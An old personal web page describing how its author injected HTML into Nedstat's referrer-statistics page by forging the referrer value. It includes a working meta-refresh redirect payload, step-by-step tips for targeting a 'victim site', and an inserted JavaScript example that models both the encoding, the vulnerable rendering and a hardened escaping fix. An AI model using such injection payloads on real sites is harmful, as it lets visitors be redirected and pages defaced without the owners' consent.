Around mid-January I added the referStat from Nedstat, a service which also collects the
referring page (URL) of your visitors. I saw it was done with some simple JavaScript using the document.referrer
property and the built-in escape(string s) function of the browser.
But then I thought: the information is written to the server, so what if I filled in some
information myself instead of the browser? Guess what? It worked! That escape(string s) gives
back a string converted to a 'standard' URL-encoded format, so I made a converter (see below). I first
tried to insert silly stuff, like some vague links such as http://www.satan.com
. Then more serious stuff like this:
http:"><meta http-equiv=refresh content=5;fly.to/55>
After 5 seconds the page switches to the Quake clan BQD, of which I'm a member. Cool huh?
At the end of February Nedstat had a countermeasure in place and now filters all tags out of the referrer strings,
but you can still insert 25 lines of 52-5=47 characters of plain text.
I found out that the string you give to the Nedstat server (say http://bqd.bikkel.com)
is processed and put into the statistics page like this:
... somewhere ... <a href="http://bqd.bikkel.com">bqd.bikkel.com</a> ... something else ...
So it appears twice, and from the second copy the http:// is stripped...
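To make that processing concrete, here is an added example in JavaScript. It is not code from the original page or from Nedstat; it models the whole path the page describes: the escape() conversion the counter script does in the browser (the converter), the server decoding the string and echoing it twice into the <a> tag, and a hardened version of that rendering that the referrer trick does not get through. The counter hostname counter.example, the parameter name ref and the page template are assumptions; the payload is the one quoted above (5 characters of http: plus 47 characters of HTML, 52 in all).

```javascript
// Added example, not code from the original page or from Nedstat. It models
// the referrer-echo flaw described above: the counter script sends
// escape(document.referrer) to the stats server, and the stats page echoes
// that string straight into an <a> tag. The counter hostname, the "ref"
// parameter name and the page template are assumptions; only the shape the
// page describes (<a href="URL">URL-without-http://</a>) is reproduced.

// The payload quoted on the page: 5 chars of "http:" plus 47 chars of HTML.
const PAYLOAD = 'http:"><meta http-equiv=refresh content=5;fly.to/55>';

// Re-implementation of the legacy browser escape(): A-Z a-z 0-9 @ * _ + - . /
// pass through, everything else becomes %XX (or %uXXXX above U+00FF).
// This is the "converter" needed to hand-craft a request the server accepts.
function legacyEscape(s) {
  let out = '';
  for (let i = 0; i < s.length; i++) {
    const ch = s[i];
    const code = s.charCodeAt(i);
    if (/[A-Za-z0-9@*_+\-./]/.test(ch)) out += ch;
    else if (code < 256) out += '%' + code.toString(16).toUpperCase().padStart(2, '0');
    else out += '%u' + code.toString(16).toUpperCase().padStart(4, '0');
  }
  return out;
}

// Inverse, as the server side would decode it (legacy unescape() semantics).
function legacyUnescape(s) {
  return s.replace(/%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})/g,
    (m, u4, x2) => String.fromCharCode(parseInt(u4 || x2, 16)));
}

// What the counter script does in the browser (hypothetical endpoint and
// parameter name). An attacker simply calls this with a string of his own
// choosing instead of document.referrer, or types the encoded URL in directly.
function buildHitUrl(referrer) {
  return 'http://counter.example/hit?ref=' + legacyEscape(referrer);
}

// Server side: pull the referrer back out of the hit URL.
function parseHitUrl(hitUrl) {
  const m = /[?&]ref=([^&]*)/.exec(hitUrl);
  return m ? legacyUnescape(m[1]) : '';
}

// The rendering the page describes: referrer echoed twice, raw into the href
// and with a leading "http://" stripped as the link text. No HTML escaping,
// so a value containing "> breaks out of the attribute and the tag.
function renderVulnerable(ref) {
  return '<a href="' + ref + '">' + ref.replace(/^http:\/\//, '') + '</a>';
}

function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// Hardened rendering: accept only a parseable http(s) URL (the URL parser
// rejects the payload's "host" outright, because space, < and > are not
// allowed in a hostname) and HTML-escape both echoes of whatever survives.
function renderHardened(ref) {
  let u;
  try { u = new URL(ref); } catch (e) { return '<span>(invalid referrer)</span>'; }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return '<span>(invalid referrer)</span>';
  const text = escapeHtml(u.href.replace(/^https?:\/\//, ''));
  return '<a href="' + escapeHtml(u.href) + '">' + text + '</a>';
}

// Walk the payload through the whole path, as the page's author did by hand.
function demo() {
  const hit = buildHitUrl(PAYLOAD);
  const ref = parseHitUrl(hit);
  return { hit, ref, vulnerable: renderVulnerable(ref), hardened: renderHardened(ref) };
}

if (typeof require !== 'undefined' && require.main === module) {
  const r = demo();
  console.log('hit URL   :', r.hit);
  console.log('vulnerable:', r.vulnerable);
  console.log('hardened  :', r.hardened);
}
```

Running it prints the encoded hit URL (the string you would paste into the converter's output), then the vulnerable markup with the meta refresh tag sitting live in the page, twice, and the hardened markup, which refuses the payload. Note that the later tag filter Nedstat added is weaker than the hardened version here: stripping tags still leaves the attribute break-out and any plain text in place, whereas escaping every echoed character makes the content inert whatever it contains.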
Now try it yourself below.
Notes
- There has to be http: in front of the string, because otherwise the server won't accept it (it replaces it with a stupid
message)
- The maximum length of the string to insert is 47 characters (my string input field is 47+5=52 characters long)
- You have 25 lines to fill; that means 25 chances to put a string of 47 characters in the page
- If you want to insert HTML tags of your own, be sure to first close the href attribute and the <a> tag with: http:">
- Be sure not to have visited your victim site before, because Nedstat then doesn't want to accept your referrer
URL
- Use at least 2 computers with different IP addresses if you want to see some result